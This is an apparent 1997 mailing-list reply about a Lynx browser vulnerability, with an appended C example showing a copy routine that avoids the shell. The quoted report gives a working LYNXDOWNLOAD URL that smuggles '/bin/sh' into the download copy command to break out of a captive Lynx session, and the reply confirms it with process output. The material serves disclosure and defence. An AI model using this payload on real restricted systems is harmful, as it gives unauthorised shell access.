Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)
From: H E Nelson
Subject: Re: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)
Date: Tue, 24 Jun 1997 23:09:10 +0900 (JST)
> subscribed to the raven list :) So, here it is in case nobody's seen
> it yet.
>
> Duncan Hill
Good work, Duncan!
> When you start up a lynx client session, you can hit "g" (for Goto) and
> then enter the following URL:
>
> URL to open:
> LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
> Enter a filename: /dev/null
> File exists. Overwrite? (y/n) y
>
> This then gives a shell on the client machine on which the lynx process is
> executing.
On my pubLynx, it does appear that a shell was created. Not only that, I
found that by using certain control keys (the terminal was initially locked
to regular keys), I could create any number of shells after that. Who
knows how it could be exploited.
# ps -aux | grep lynx | grep -v grep
lynx 2493 0.0 3.3 3508 2868 pts/0 S 22:33:26 0:00 /usr/local/bin/lyn
lynx 2498 0.0 0.8 844 644 pts/0 S 22:34:51 0:00 sh -c /usr/bin/cp
lynx 2500 0.0 1.0 1168 856 pts/0 S 22:34:52 0:00 /bin/sh
lynx 2545 0.0 1.2 1300 972 pts/0 S 22:56:00 0:00 /bin/csh
> We would be interested in knowing whether this is a known problem. The
> reporter suggested that disabling downloads would be an appropriate
> workaround. If you are in agreement with this, is this a feature that is
> enabled by default? (This would require the captive session to be started
> using the "-restrictions=download" option, wouldn't it?)
The "-restrictions=download" command line switch did not seem to prevent
someone from getting a shell on my setup. I'll do more experimenting on
a machine not connected to the Net.
Needless to say, pubLynx is down until this problem is solved. Sorry, folks.
__Henry
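
The `sh -c /usr/bin/cp` entry in the ps listing above indicates the download copy is run through a shell, which is why the `;` characters in the `File=` value matter. The following is an added example, not part of the original message and not Lynx source code, contrasting a shell command string with a copy that passes each file name as a single argv entry. The function names and the exact command format are assumptions made for illustration.

```c
/* Added example, not Lynx source. Assumption: the download step builds one
 * command string and hands it to "sh -c", as the "sh -c /usr/bin/cp" line
 * in the ps listing suggests. Function names here are hypothetical. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Shell-string pattern: the text a shell would be asked to parse.
 * Built only for inspection; this example never executes it. */
int build_shell_cmd(char *out, size_t n, const char *src, const char *dst)
{
    return snprintf(out, n, "cp %s %s", src, dst);
}

/* Hardened pattern: no shell. Each name is exactly one argv entry, so ';'
 * has no meaning, and "--" stops a leading '-' being read as an option.
 * Returns cp's exit status, or -1 if cp could not be run or waited for. */
int copy_noshell(const char *src, const char *dst)
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "cp", "--", (char *)src, (char *)dst, NULL };
        execvp("cp", argv);
        _exit(127);                     /* exec itself failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    const char *file = "/dev/null;/bin/sh;";  /* File= value from the report */
    char cmd[256];

    build_shell_cmd(cmd, sizeof cmd, file, "/dev/null");
    printf("shell would parse: %s\n", cmd);
    printf("contains ';': %s\n", strchr(cmd, ';') ? "yes" : "no");
    /* cp looks for one file with that literal name and fails; no shell runs */
    printf("no-shell exit status: %d\n", copy_noshell(file, "/dev/null"));
    return 0;
}
```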